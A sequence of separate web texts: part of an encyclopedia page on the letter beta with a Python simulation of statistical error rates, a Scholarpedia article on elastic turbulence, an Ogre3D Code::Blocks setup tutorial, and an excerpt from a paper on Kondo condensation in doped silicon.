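The type II error rate is conventionally denoted β (power = 1 − β), which is why it appears on this page. Both rates can be estimated by simulation: run a test many times under a true null and under a false one. A sketch using a two-sided z-test with known unit variance (sample size, effect size, and trial count are arbitrary choices for illustration):

```python
import numpy as np

rng = np.random.default_rng(1)
alpha, n, trials = 0.05, 30, 20000
z_crit = 1.96  # two-sided standard-normal critical value at alpha = 0.05

def rejects_null(sample):
    """Two-sided z-test of H0: mean = 0, assuming known unit variance."""
    z = sample.mean() * np.sqrt(len(sample))
    return abs(z) > z_crit

# Type I error: rejecting a TRUE null. Simulate data with mean 0.
type1 = np.mean([rejects_null(rng.normal(0.0, 1.0, n)) for _ in range(trials)])

# Type II error (beta): failing to reject a FALSE null. Simulate mean 0.5.
type2 = np.mean([not rejects_null(rng.normal(0.5, 1.0, n)) for _ in range(trials)])

print(f"type I ≈ {type1:.3f} (target {alpha}), beta ≈ {type2:.3f}, power ≈ {1 - type2:.3f}")
```

The type I rate should land near the nominal α = 0.05, while β depends on the effect size and sample size chosen.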
Ve (В в; italics: В в) is a letter of the Cyrillic script.
The Video Home System (VHS) is a standard for consumer-level analog video recording on tape cassettes.
Voiced bilabial fricative
The voiced bilabial fricative is a type of consonantal sound, used in some spoken languages.
Voiced bilabial stop
The voiced bilabial stop is a type of consonantal sound, used in some spoken languages.
Voiced labiodental fricative
The voiced labiodental fricative is a type of consonantal sound used in some spoken languages.
2005 Atlantic hurricane season
The 2005 Atlantic hurricane season was the most active Atlantic hurricane season in recorded history, shattering numerous records.
Beta (Greek letter), Beta (Greek), Beta (letter), Beta letter, Curled beta, Latin beta, Vita (letter), \beta, Β, Βήτα, Ꞵ. | <urn:uuid:3bc59dba-69d2-4f8c-8cbc-25522b928e90> | CC-MAIN-2023-14 | https://en.unionpedia.org/Beta | s3://commoncrawl/crawl-data/CC-MAIN-2023-14/segments/1679296945144.17/warc/CC-MAIN-20230323100829-20230323130829-00604.warc.gz | en | 0.810164 | 2,705 | 3.25 | 3 |
Victor Steinberg (2008), Scholarpedia, 3(8):5476. doi:10.4249/scholarpedia.5476, revision #73072.
Long polymer molecules added to a fluid make it elastic and capable of storing stresses that depend on the history of deformation, thereby providing the fluid with a memory. Many properties of polymer solution flows (especially dilute ones) can be understood on the basis of single-polymer dynamics, where the polymer experiences the combined action of stretching by the flow and elastic relaxation. The elastic stress created by polymer stretching in the flow becomes the main source of nonlinearity in a polymer solution flow at low Reynolds numbers, Re. As a result, an elastic instability shows up when the elastic energy overcomes the dissipation due to polymer relaxation. The ratio of the nonlinear elastic term to the linear relaxation is defined by the Weissenberg number, Wi. In a simple shear flow of a polymer solution the elastic stress is anisotropic and characterized by the difference in the normal stresses along the flow velocity direction and the velocity gradient direction. In a curvilinear shear flow (e.g. Couette flow between rotating cylinders) the normal stress difference gives rise to a volume force acting on the fluid in the direction of the curvature, the "hoop stress". The latter becomes the driving force for the rod-climbing effect as well as for an elastic instability. The mechanism of the elastic instability in the Couette flow was first suggested theoretically and then verified experimentally. It was also widely investigated in other flow geometries with curvilinear trajectories, including a curvilinear channel. The streamline curvature is a necessary ingredient to reduce the critical Weissenberg number for the instability onset, Wic. On the other hand, the possibility of an elastic instability in a straight channel was suggested and studied theoretically and numerically, though its experimental verification is still lacking.
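For reference, the dimensionless numbers used above can be written out explicitly. These are the standard definitions (not quoted from this article), with \(\lambda\) the polymer relaxation time, \(\dot\gamma\) the characteristic shear rate, and \(U\), \(L\) a characteristic velocity and length; the last equality assumes \(\dot\gamma \sim U/L\):

```latex
\mathrm{Wi} = \lambda\,\dot{\gamma}, \qquad
\mathrm{Re} = \frac{\rho U L}{\eta}, \qquad
\mathrm{El} = \frac{\mathrm{Wi}}{\mathrm{Re}} = \frac{\lambda\,\eta}{\rho L^{2}}
```

The elasticity number El is useful because it is set by the fluid and geometry alone: when El is large, the elastic instability threshold is reached while Re is still vanishingly small.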
Above the purely elastic instability, the path to a chaotic flow in the form of irregular flow patterns at Wi > Wic was studied in three flow geometries: Couette flow between cylinders, swirling flow between two disks, and flow in a curvilinear channel. It was reasonable to assume that at sufficiently high Wi and vanishingly small Re a random flow can be excited which exhibits continuous velocity spectra in a wide range of temporal and spatial scales, similar to a hydrodynamic turbulent flow. Indeed, such a random flow was first observed in both Couette and swirling flows of dilute polymer solutions and dubbed "elastic turbulence". It was identified in the swirling flow between two disks by three main features: a sharp growth in flow resistance, an algebraic decay of the velocity power spectra over a wide range of scales, and mixing that is orders of magnitude more effective than in an ordered flow. These properties are analogous to those of hydrodynamic turbulence. Elastic turbulence in the swirling flow was observed in dilute polymer solutions of various polymer concentrations down to 7 ppm. Since the elastic energy is proportional to the polymer concentration and should exceed a dissipation that is independent of it, one should expect a minimum threshold concentration below which elastic turbulence cannot be generated.
However, the similarities do not imply that the physical mechanism that underlies the two kinds of random motion is the same. Indeed, in contrast with inertial turbulence at high Reynolds numbers Re, which occurs due to large Reynolds stresses, large elastic stress is the main source of non-linearity and the cause of elastic turbulence in low-Re flows of polymer solutions. One can suggest that in a random flow driven by elasticity, the elastic stress tensor \(\tau_p\) should be the object of primary importance and interest, and that it may be appropriate to view elastic turbulence as turbulence of the \(\tau_p\)-field. It would then be more relevant and instructive to explore the spatial structure and the temporal distribution of this field. However, currently no experimental technique allows a direct local measurement of the elastic stress in a turbulent flow. On the other hand, properties of the \(\tau_p\)-field in a boundary layer were inferred from measurements of injected power, whereas its local properties were evaluated from measurements of spatial and temporal distributions of velocity gradients.
The key early experimental observation is the power-law decay of the velocity power spectra in all flow geometries, with an exponent d>3 (between 3.3 and 3.6). Due to the sharp decay of the velocity spectrum, the velocity and the velocity gradient are both determined by the integral scale, i.e., the vessel size. This means that elastic turbulence is essentially a spatially smooth, random-in-time flow, dominated by strong nonlinear interaction of a few large-scale modes. This type of random flow appears in hydrodynamic turbulence below the dissipation scale and is called the Batchelor flow regime. Further characterization of this random flow was conducted by measuring velocity correlation functions via particle image velocimetry.
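In practice the exponent d is extracted by fitting a power law E(k) ∝ k^(-d) to the measured spectrum on log-log axes. A sketch of that procedure on a synthetic spectrum fabricated with d = 3.5 (illustrative data, not measurements from these experiments):

```python
import numpy as np

rng = np.random.default_rng(2)
k = np.logspace(0, 2, 200)  # wavenumbers, arbitrary units
d_true = 3.5
# Synthetic power spectrum with multiplicative scatter, mimicking E(k) ~ k^-d.
E = k ** (-d_true) * np.exp(rng.normal(0.0, 0.1, k.size))

# The slope of log E versus log k estimates -d.
slope, _ = np.polyfit(np.log(k), np.log(E), 1)
d_est = -slope
print(round(d_est, 2))  # ≈ 3.5
```

Real spectra require choosing the fitting range carefully, since the power law holds only over the intermediate band of scales.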
These early experimental results initiated theoretical studies. On a molecular level, the onset of elastic turbulence is attributed to the occurrence of a coil-stretch transition in the presence of a fluctuating velocity field at Wi>1. The possibility of polymer stretching in a random flow was first suggested and discussed by Lumley in regard to turbulent drag reduction in hydrodynamic turbulence. Theory further predicts that at Wi>1 a dramatic change in the statistics of polymer stretching takes place, and the majority of molecules become strongly stretched, up to the full polymer length. This prediction was experimentally verified recently. The coil-stretch transition has remarkable macroscopic consequences for the flow: properties of the polymer solution flow become essentially non-Newtonian. The hydrodynamic description of a polymer solution flow, and particularly the dynamics of the elastic stresses, is analogous to that of a small-scale fast dynamo in magneto-hydrodynamics (MHD) and also to turbulent advection of a passive scalar in the Batchelor regime. The stretching of the magnetic lines is similar to polymer stretching, and the difference with MHD lies in the relaxation term that replaces the diffusion term. In all three cases the basic physics is the same, rather general, and directly related to the classical Batchelor regime of mixing: stretching and folding of the stress field by a random advecting flow. In elastic turbulence a statistically steady state occurs due to the feedback reaction of stretched polymers (or the elastic stress) on the velocity field, which leads to a saturation of \(\tau_p\) even for a linear polymer relaxation model. The saturation of \(\tau_p\), and therefore of the rms of the velocity gradient fluctuations, in an unbounded flow of a polymer solution are the key theoretical predictions.
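The hydrodynamic description with a linear relaxation term referred to here is commonly written as the Oldroyd-B (linear dumbbell) model for the polymer conformation tensor \(\mathbf{c}\). In this standard form (one common index convention; not quoted from this article) the stretching terms mirror the MHD induction equation, with the linear relaxation term playing the role of magnetic diffusion:

```latex
\frac{\partial \mathbf{c}}{\partial t} + (\mathbf{v}\cdot\nabla)\,\mathbf{c}
  = (\nabla \mathbf{v})^{T}\,\mathbf{c} + \mathbf{c}\,(\nabla \mathbf{v})
    - \frac{\mathbf{c} - \mathbb{1}}{\lambda},
\qquad
\boldsymbol{\tau}_{p} = \frac{\eta_{p}}{\lambda}\,\bigl(\mathbf{c} - \mathbb{1}\bigr)
```

Here \(\lambda\) is the polymer relaxation time and \(\eta_p\) the polymer contribution to the viscosity; the first two terms on the right describe stretching by velocity gradients, the last describes elastic relaxation back to the isotropic equilibrium \(\mathbb{1}\).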
The same analysis leads to a power-law decaying spectrum for the elastic stresses and for the velocity field fluctuations, with an exponent d>3, in good accord with the experimental results.
Further experimental studies of elastic turbulence confirm the theoretical prediction of the saturation of the rms of the velocity gradient (or vorticity) fluctuations in an unbounded flow (in the bulk flow), though the saturation level found is several times that predicted theoretically.
But the main message of the experimental study is a surprising similarity in scaling, statistics, and structure of the elastic stresses and of passive scalar mixing in elastic turbulence in a finite size vessel, in spite of the important difference in the dynamo effect. The latter occurs due to the feedback reaction of stretched polymers (or the elastic stress) on the velocity field.
The experiments also reveal the role of elastic stresses in elastic turbulence due to the presence of walls in a von Karman swirling flow between two disks. The following features of elastic turbulence were found experimentally.
- The rms of the velocity gradients (and thus the elastic stress) grows linearly with Wi in the boundary layer, near the driving disk. The rms of the velocity gradients in the boundary layer is one to two orders of magnitude larger than in the bulk, suggesting that the elastic stresses are accumulated near the wall and are intermittently injected into the bulk.
- The PDFs of the injected power at either constant angular speed or torque show skewness and exponential tails, which both indicate intermittent statistical behavior. Also the PDFs of the normalized accelerations, which can be related to the statistics of the velocity gradients via the Taylor hypothesis, exhibit well-pronounced exponential tails.
- A new length scale, namely the thickness of the boundary layer, as measured from the profile of the rms of the velocity gradient, is found to be relevant for the boundary layer of the elastic stresses. The velocity boundary layer just reflects some of the features of the boundary layer of the elastic stress (rms of the velocity gradients). The measured length scale is much smaller than the vessel size.
- The scaling of the structure functions of the vorticity, velocity gradients, and injected power is found to be the same as that of a passive scalar advected by the velocity field in elastic turbulence.
These properties provide a basis for a model of the dynamics of elastic turbulence, in which elastic stress is introduced into the fluid by the driving boundary, accumulates in the boundary layer, and is intermittently injected into the bulk of the flow. The situation is closely analogous to the trapping of a passive scalar in the mixing boundary layer of a finite-size vessel and its intermittent injection into the bulk.
The non-uniform distribution of the elastic stress, which is caused by non-uniform polymer stretching, is indeed verified experimentally by studying the statistics of the stretching of a single polymer in an elastic turbulent flow generated by the same polymers. These experiments present the first direct elastic stress measurements in a flow and confirm the saturation of the elastic stress in the bulk and the existence of a boundary layer near the wall. Moreover, at larger polymer concentrations the saturation level decreases and asymptotically approaches the value predicted theoretically for linear polymer elasticity. This result elucidates the relation between two theoretical mechanisms that can lead to stress saturation: (i) the feedback reaction on the flow of polymer molecules with linear elasticity, and (ii) the nonlinear elasticity of the polymer molecules. At higher polymer concentrations the polymer stretching is reduced, and the former mechanism dominates. The concentration dependence of the flow structure and of the statistics of the velocity and velocity-gradient fields over a wide range of polymer concentrations, from 80 to 3000 ppm, reveals a similar tendency: the larger the concentration, the lower the saturation level of the rms of the velocity gradients. On the other hand, fluctuations of the injected power and pressure fluctuations show no concentration dependence over the same range, either in their statistics, in the scaling exponents of the algebraic decay of the velocity power spectra, or in the dependence of the average and rms velocity fluctuations on Wi.
Analogous studies in a curvilinear channel flow and direct measurements of velocity-gradient statistics by homodyne light-scattering techniques are under way. The next step in this investigation should be direct measurements of the statistics and distribution of the elastic stress in elastic turbulence in a macroscopic-size vessel.
- R. B. Bird, C. F. Curtiss, R. C. Armstrong, O. Hassager, Dynamics of Polymeric Liquids, (John Wiley, NY), 1987.
- R. G. Larson, E. S. G. Shaqfeh, S. J. Muller, J. Fluid Mech. 218, 573 (1990).
- A. Groisman and V. Steinberg, Phys. Fluids 10, 2451 (1998).
- A. Groisman and V. Steinberg, Nature 405, 53 (2000).
- J. Lumley, Symp. Math. 9, 315 (1972).
- E. Balkovsky, A. Fouxon, and V. Lebedev, Phys. Rev. Lett. 84, 4765 (2000); M. Chertkov, Phys. Rev. Lett. 84, 4761 (2000).
- S. Gerashchenko, C. Chevallard, V. Steinberg, Europhys. Lett. 71, 221 (2005).
- A. Fouxon and V. Lebedev, Phys. Fluids 15, 2060 (2003).
- T. Burghelea, E. Segre, V. Steinberg, Phys. Rev. Lett. 96, 214502 (2006); Phys. Fluids 19, 053104 (2007).
- Y. Liu and V. Steinberg, submitted.
- Y. Jun and V. Steinberg, submitted.
Setting Up An Application With Code::Blocks And MinGW
This set of instructions will walk you through setting up a Code::Blocks C++ project from scratch. An alternative to this tutorial is to use the Ogre Application Wizard instead. This tutorial is still useful if you wish to understand what the Application Wizard does for you. When you have finished this tutorial you will be able to compile a working Ogre Application and you will be ready to start the Basic Tutorials.
Table of contents
- Setting up Code::Blocks / MinGW for OGRE Development
- Install the latest MinGW official distribution
- Install Code::Blocks
- Create new Console application project
- Add the Wiki Tutorial Framework
- Project Build Options
- Common Build Options
- Debug Build options
- Release Build options
Install the Ogre SDK as detailed here: Installing the Ogre SDK
Make sure that the environment variable OGRE_HOME is pointing to the root of the Ogre MinGW SDK.
Setting up Code::Blocks / MinGW for OGRE Development
Install the latest MinGW official distribution
OGRE 1.7.2 requires MinGW 4.5. Get it at: http://www.mingw.org/
For instructions on how to install MinGW go to: http://www.mingw.org/wiki/InstallationHOWTOforMinGW
Download the Code::Blocks official release.
It is suggested to download the version that does not come with its own version of MinGW, as it might be incompatible with the one used to compile the Ogre SDK.
Create a directory for it - C:\CodeBlocks - and unzip the three archives into it.
Start Code::Blocks and pick the MinGW compiler from the list of detected build systems.
Go to Settings -> Compiler and Debugger to show the Global compiler settings:
It should be populated properly, but it can't hurt to check.
Also make sure that the MinGW version Code::Blocks uses is the same that was used to compile Ogre.
Do not use the MinGW version that comes with Code::Blocks. It is rather old.
You can find out your version of MinGW by going to "C:\MinGW\lib\gcc\mingw32".
This folder will contain another folder with a version number.
Create new Console application project
Click the 'Create a new project' link in the Code::Blocks start page, or find it in the menu.
Choose 'Console application':
Be sure to put the project in a directory with no spaces in the (full) name.
A good name would be 'C:\Projects\OgreProject':
Add the Wiki Tutorial Framework
Now we need to add some files to the project. Download the Ogre Wiki Tutorial Framework:
Unpack the four files into your new OgreProject directory:
Right-click main.cpp in the project tree and delete it.
Now, we need to add the wiki tutorial framework to our project.
Right-click the project and choose Add files recursively...:
You are given a list of four files. Click 'OK' to add them:
Project Build Options
Right-click our OgreProject and choose Build options from the context menu:
Common Build Options
Compiler settings - Other options
Set Compiler settings - Other options to
-mthreads -fmessage-length=0 -fexceptions -fident
Make sure that OgreProject is selected, and not one of the build configurations.
Compiler settings - defines
Set Compiler settings - defines to
Again, make sure that OgreProject is selected, and not one of the build configurations.
Linker settings - Other linker options
Set Linker settings - Other linker options to
-Wl,--enable-auto-image-base -Wl,--add-stdcall-alias -Wl,--enable-auto-import
Again, make sure that OgreProject is selected in the configuration tree.
Search Directories - Compiler
Set Search Directories - Compiler to
$(OGRE_HOME)\include $(OGRE_HOME)\include\OGRE $(OGRE_HOME)\include\OIS $(OGRE_HOME)\boost
Again, make sure that OgreProject is selected in the configuration tree (and not one of the build configurations).
Search Directories - Linker
Set Search Directories - Linker to
Again, you need to have OgreProject selected, not one of the build configurations!
Debug Build options
Select the Debug build configuration in the configuration selector on the left.
Debug - Compiler settings - defines
Set Debug - Compiler settings - defines to
Debug - Linker settings - Link libraries
Set Debug - Linker settings - Link libraries to
Release Build options
Release - Compiler settings - defines
Set Release - Compiler settings - defines to
Release - Linker settings - Link libraries
Set Release - Linker settings - Link libraries to
Additional libraries when using boost
When you use a version of the Ogre SDK that uses boost, you will need to link against some boost libraries.
For boost 1.50+, these are:
date_time thread system chrono
For previous boost versions, you can ignore system and chrono.
To get the exact file names, have a look at your Ogre SDK folder. If it uses boost, it will contain a "boost" folder which has all needed libraries in "lib" in both debug and release. (Remember to add "$(OGRE_HOME)\boost\lib" to "Search Directories - Linker" if you use boost!)
One filename could be, for example, "libboost_date_time-mgw47-mt-1_51.a", which is a boost 1.51 version compiled with MinGW GCC 4.7.X.
For this, you would have to link against "boost_date_time-mgw47-mt-1_51".
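Putting the naming rule together, for a (hypothetical) Ogre SDK built against boost 1.51 with MinGW GCC 4.7, the full set of entries you would add to Linker settings - Link libraries is:

```
boost_date_time-mgw47-mt-1_51
boost_thread-mgw47-mt-1_51
boost_system-mgw47-mt-1_51
boost_chrono-mgw47-mt-1_51
```

Adjust the "mgw47" and "1_51" parts to match the filenames you actually find in your own $(OGRE_HOME)\boost\lib folder, and drop the system/chrono entries for boost versions before 1.50.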
If you want to run your executable from within Code::Blocks, you need to set up 'working directory' and 'command' in the project settings like this:
You should now be able to compile and run your Ogre application.
Well, maybe not until you've copied the executable to the Ogre SDK bin directory (or taken resources.cfg and plugins.cfg from there), or copied the Ogre DLLs and media next to it. But that's something for a later wiki article.
Proceed to the Tutorials. | <urn:uuid:9edce2b5-0090-4f22-a883-9ffd738780b1> | CC-MAIN-2023-14 | https://wiki.ogre3d.org/Setting+Up+An+Application+-+CodeBlocks | s3://commoncrawl/crawl-data/CC-MAIN-2023-14/segments/1679296945440.67/warc/CC-MAIN-20230326075911-20230326105911-00004.warc.gz | en | 0.786903 | 1,433 | 2.78125 | 3 |
When a magnetic moment is embedded in a metal, it captures nearby itinerant electrons to form a so-called Kondo cloud. When magnetic impurities are sufficiently dense that their individual clouds overlap with each other they are expected to form a correlated electronic ground state. This is known as Kondo condensation and can be considered a magnetic version of Bardeen–Cooper–Schrieffer pair formation. Here, we examine this phenomenon by performing electrical transport and high-precision tunnelling density-of-states spectroscopy measurements in a highly P-doped crystalline silicon metal in which disorder-induced localized magnetic moments exist. We detect the Kondo effect in the resistivity of the Si metal at temperatures below 2 K and an unusual pseudogap in the density of states with gap edge peaks below 100 mK. The pseudogap and peaks are tuned by applying an external magnetic field and transformed into a metallic Altshuler–Aronov gap associated with a paramagnetic disordered Fermi liquid phase. We interpret these observations as evidence of Kondo condensation followed by a transition to a disordered Fermi liquid.
The interplay of electron–electron interactions, disorder and spin correlation in solids is the origin of many competing ground states and phase transitions between them1,2,3, which are typically observed in strongly correlated complex materials ranging from heavy-fermion compounds4 to high-temperature superconductors5,6. An intriguing question in complex interacting systems is how the interactions of microscopic particles lead to macroscopic phenomena such as superconductivity, charge and spin density waves and heavy fermions. The Kondo effect very often plays a central role in understanding the correlated ground states of electron systems and electrical transport (Fig. 1). Doping is a versatile tool with which to address this question because of its ability to control the interaction strength and the way particles interact with each other and with external perturbations such as magnetic fields and pressure7,8.
Here, we report observations of the Kondo interaction and an exotic Bardeen–Cooper–Schrieffer (BCS)-type pseudogap in highly P-doped degenerate silicon (Si:P) with doping concentrations of n ≈ 2–5 × 10^19 cm^−3 at very low temperatures (Methods). The existence and formation of magnetic moments in metallic Si:P are well understood in terms of Anderson's picture and well explained in the pioneering works of Bhatt and Lee and others9,10,11,12. Because of the high doping concentration (higher than ~2 × 10^19 cm^−3), the Fermi energy (EF) in Si:P lies in the conduction band13, as it does in a metal (Supplementary Fig. 4a). In these circumstances, it is very likely that the local moments are entangled with the conduction electrons to form micrometre-sized Kondo clouds14,15 that overlap with each other (Fig. 1b), leading to a correlated ground state in the Si:P metal. In this work, tunnelling density-of-states (DOS) spectroscopy and bulk electrical transport measurements allow the electronic and magnetic nature of competing ground states in the Si:P metal to be explicitly identified and the relevant phase diagram in the temperature–magnetic field (T–B) plane to be constructed.
We first measured the differential resistance Rd of a bulk Si:P metal as a function of T and B. At B = 0 G, Rd exhibited strong temperature dependence at high temperatures (Fig. 2a). As T decreased below approximately 2 K, a clear anomaly appeared as a broadened step-like increase in Rd with decreasing T, and then it decreased slightly below ~1 K. As only a limited temperature range was available, the observed step-like increase is difficult to describe analytically but the ln(T) behaviour (blue line) may be relevant. The temperature dependence of the resistance is reminiscent of that of a Kondo lattice compound with disorder16. The increase in ln(T) and the subsequent decrease in the resistivity of heavy-fermion compounds is attributed to Kondo scattering and the crossover to a coherent state of conduction and localized electrons. A modest magnetic field switches the non-Fermi liquid metal state to a conventional disordered Fermi liquid (DFL), confirming that the observed resistivity anomaly below 2 K is associated with magnetic interactions. On the other hand, the B-dependent Rd at 10 and 77 mK exhibited a small dip in the low-magnetic-field region (Fig. 2b), supporting the presence of the coupling of the local magnetic moments and conducting electrons. A similar magnetoresistance feature is observed in Ce-based heavy-fermion compounds and is attributed to magnetic quantum criticality17.
In fact, the interplay between the competing interactions may switch the ground state of the Si:P metal. The competition between the ground states can be elucidated by observing the evolution of tunnelling DOS spectra near EF of the Si metal at various T and B. For this purpose, we fabricated tunnel junction devices consisting of the Si:P metal with silver (Ag) electrodes separated by a thin SiO2 tunnel barrier for the tunnelling DOS spectroscopy measurements (Fig. 2c and Methods). We also conducted experiments with Al–SiO2–Si:P tunnel junctions that revealed the expected Al superconducting energy gap and proved that tunnelling was the major transport mechanism in such structures. Because Ag behaves similarly to a Fermi liquid with a flat DOS region in the vicinity of EF, the measured differential tunnelling conductance G is directly proportional to the DOS of Si:P: G(V) ∝ DOS(E), where E = EF + eV (V is the voltage across the tunnel barrier and e is the elementary charge). Some of the basic results measured below 200 mK are presented in Fig. 2d,e, which displays the measured G–V characteristics at various temperatures at B = 0 G and an intensity plot of G in the T–V plane, respectively. At T = 18 mK, a partial depletion of the tunnelling DOS near EF, which may be referred to as a pseudogap, is seen in the G–V characteristics near V = 0 V, and anomalous peaks appear outside the pseudogap. As T increases, the depleted DOS within the pseudogap is restored, and the peaks become closer in a nonlinear manner. Above ~160 mK, the U-shaped pseudogap with the side peaks changes into a V^1/2-type Altshuler–Aronov gap (also called a zero-bias anomaly (ZBA))18, which is anticipated for metallic bulk Si with disorder and Coulomb correlations in the paramagnetic DFL phase.
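The relation G(V) ∝ DOS(EF + eV) quoted above holds in the zero-temperature limit; at finite T the measured conductance is the DOS convolved with the derivative of the Fermi function, which smears features on a scale of a few kBT and is one reason the pseudogap fills in as T rises. A minimal numerical sketch of that standard convolution, using a toy U-shaped DOS with gap-edge peaks (all model parameters are illustrative assumptions, not fits to the data):

```python
import numpy as np

kB = 8.617e-5  # Boltzmann constant, eV/K

def fermi_deriv(E, T):
    """-df/dE of the Fermi function at temperature T, in eV^-1."""
    return 1.0 / (4.0 * kB * T * np.cosh(E / (2.0 * kB * T)) ** 2)

def smeared_conductance(dos, E, eV, T):
    """G(V) ~ integral dE DOS(E) * (-df/dE)(E - eV)."""
    kernel = fermi_deriv(E - eV, T)
    dE = E[1] - E[0]
    return np.sum(dos * kernel) * dE

# Toy U-shaped pseudogap with gap-edge peaks (purely illustrative numbers)
E = np.linspace(-1e-4, 1e-4, 4001)                      # energy grid, eV
gap = 2e-5                                              # half-width of gap, eV
dos = np.where(np.abs(E) < gap, 0.2, 1.0)               # depleted DOS inside gap
dos = dos + 0.8 * np.exp(-((np.abs(E) - gap) / 5e-6) ** 2)  # edge peaks

g_cold = smeared_conductance(dos, E, 0.0, 0.018)  # zero-bias G at 18 mK
g_warm = smeared_conductance(dos, E, 0.0, 0.160)  # zero-bias G at 160 mK
print(g_cold, g_warm)  # the depleted zero-bias DOS is partially restored at 160 mK
```

The sketch reproduces the qualitative trend of Fig. 2d: thermal broadening alone partially refills the gap, while the full closing observed experimentally requires the magnetic transition described in the text.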
Next, we present results that show how the anomalous DOS spectrum at EF varies with B at T = 18 mK. Figure 3a,b presents examples of the measured G–V characteristics at various B below 3,000 G and an intensity plot of G in the B–V plane. As B increases, the peaks become closer together, and the depth and width of the U-shaped pseudogap decrease. Most noticeably, the pseudogap and peaks smoothly change into the Altshuler–Aronov ZBA of the paramagnetic DFL phase. Afterwards, the |V|^1/2-dependent G–V curve remains unchanged and independent of B. Interestingly, in the intermediate B region between approximately 1,000 and 2,000 G, G(V) increases linearly as a function of V up to the position of the considerably smaller peaks and then remains constant. Thus, this |V|^1-dependent G–V curve has a V-shaped groove, which is distinct from the ZBA. The inset in Fig. 3a shows a comparison of this V-shaped pseudogap and the ZBA. The depth and width of the V-shaped pseudogap continue to decrease with increasing B and T (Supplementary Fig. 5); however, its dependence on B is much weaker than that of the U-shaped pseudogap in the low-B region. We have confirmed that the observed anomalous DOS spectra are not hysteretic in B by sweeping B in both directions. Thus, the observed smooth B-driven phase transition, together with the electrical properties of a bulk Si:P metal, reveal that an exotic magnetically correlated state (which is not generally anticipated in a simple elemental semiconductor) seems to exist in the degenerately doped Si:P metal. T- and B-dependent characteristics of the pseudogap and anomalous peaks are presented in the Supplementary Figs. 6 and 7.
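The three spectral shapes described here can be captured by simple model forms: an Altshuler–Aronov anomaly rising as |V|^1/2, a V-shaped groove linear in |V| up to small peaks, and a U-shaped BCS-like pseudogap with edge peaks. The parameterizations below are illustrative only — amplitudes, gap widths and peak positions are assumptions, not values extracted from the measurements:

```python
import numpy as np

def aa_zba(V, G0=1.0, a=30.0):
    """Altshuler-Aronov zero-bias anomaly: G = G0 * (1 + a*sqrt(|V|))."""
    return G0 * (1.0 + a * np.sqrt(np.abs(V)))

def v_groove(V, Vp=5e-5, G0=1.0, depth=0.5):
    """V-shaped pseudogap: linear in |V| up to the peak position Vp, flat outside."""
    return G0 - depth * np.clip(1.0 - np.abs(V) / Vp, 0.0, None)

def u_gap(V, Vg=2e-5, G0=1.0, depth=0.8, peak=0.6, w=5e-6):
    """U-shaped BCS-like pseudogap with gap-edge peaks at |V| = Vg."""
    base = np.where(np.abs(V) < Vg, G0 - depth, G0)
    return base + peak * np.exp(-((np.abs(V) - Vg) / w) ** 2)

V = np.linspace(-1e-4, 1e-4, 2001)  # bias voltage grid, volts
for name, G in [("AA", aa_zba(V)), ("V-shaped", v_groove(V)), ("U-shaped", u_gap(V))]:
    print(name, "G(0) =", round(float(G[len(V) // 2]), 3))
```

Plotting these three curves against the measured G–V traces makes the B-driven crossover of Fig. 3a easy to see: only the zero-bias value and the curvature near V = 0 distinguish the phases.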
Nonlinear behaviour is observed in the B-dependent restoration of the DOS at EF (G at V = 0 V) at various T from 18 mK to 160 mK. The smooth magnetic phase transition from the magnetic pseudogap phase to the paramagnetic DFL phase is demonstrated in the intensity plot for the zero-bias differential conductance, G(V,B), at 18 mK for each value of B (Supplementary Fig. 8). In the low-T region below approximately 100 mK, the DOS minimum (pseudogap) at EF is reinstated superlinearly with B and then sublinearly up to the value of B (Supplementary Fig. 9a) at which the non-magnetic |V|^1/2-dependent ZBA starts to appear in the DFL phase. There exists a clear inflection point (marked with the vertical arrows in the inset of Supplementary Fig. 9a) in the derivative of the G(V = 0 V)–B curve, and we regard this point as the boundary between the superlinear (strongly B-dependent) and sublinear (weakly B-dependent) regions. As T increases, the inflection B point shifts to lower B values, making a boundary in the T–B plane (black diamonds in Supplementary Fig. 9b). The measured tunnelling conductance of Al–SiO2–Si:P devices confirms a strong modification in the DOS near EF of the Si:P metal (Supplementary Fig. 10).
The T–B phase diagram of the Si:P metal shown in Fig. 4 summarizes our main experimental results. Two different phases are clearly visible in the intensity map of the DOS at EF in the T–B plane with an intervening region. The blue region corresponds to the magnetic metal phase where the U-shaped pseudogap and large anomalous DOS peaks outside the gap appear. The black diamonds show the inflection point in the derivative of the G(V = 0 V)–B curve as a function of T. In this phase, the DOS spectrum at EF (G at V = 0 V) changes strongly as B varies. The red stars represent the temperature at which the non-magnetic |V|^1/2-type ZBA is detected first, T*, at different B, creating the most important characteristic boundary between the magnetically correlated metal phase and the non-magnetic DFL phase. The magnetic metal phase transforms smoothly into the paramagnetic DFL phase (yellow region) through the intervening weakly magnetic metal phase (green region), where the V-shaped DOS spectrum appears with considerably weaker DOS peaks. In this intervening phase, the depleted DOS at EF is reinstated relatively weakly with increasing B. The boundary consisting of the green circles indicates the temperature at which the anomalous DOS peaks are first detected (TΔ; Supplementary Fig. 6).
Observations of the abnormal electronic DOS spectra in the Si:P metal and their B-driven tuning are very surprising because neither the host Si nor the dopant P show a magnetic order in the crystal structure, and degenerate Si:P is regarded as a metal (EF is located within the conduction band). We ruled out several possible mechanisms that could be responsible for our exotic DOS spectra. First, we ruled out a Coulomb gap scenario because it cannot explain the magnetic behaviour. Second, we ruled out spin glass-type magnetic gaps19 because no noticeable differences were seen between the field-cooled and zero-field-cooled DOS spectra. Neither of these mechanisms can explain the existence of DOS peaks outside the gap or the observed non-Fermi-liquid behaviours in the resistance of bulk Si:P. We also eliminated the possibility of the Kondo lattice gap because the local moments in our sample were randomly distributed. Indeed, our DOS was highly symmetric, while the DOS of the Kondo lattice system has a characteristic asymmetry20. In fact, Si:P is not a heavy-fermion system. Third, the ground state with RKKY interaction-induced magnetic order, for example, the random singlet state (Fig. 1d), is not relevant because it does not have any gap at EF (ref. 21). In addition, the spin density wave caused by the RKKY interaction may produce a BCS-like gap at EF but the preliminary condition for such a mechanism is the lattice translation symmetry, which is absent in our Si metal due to random impurities. Finally, unlike boron (B)-doped degenerate Si (ref. 22), superconductivity has not been observed in P-doped Si and a clear signature of superconductivity (a collapse of the bulk resistance) was not also detected in our Si metal down to 10 mK. However, we do not entirely exclude the occurrence of incipient or hidden superconductivity.
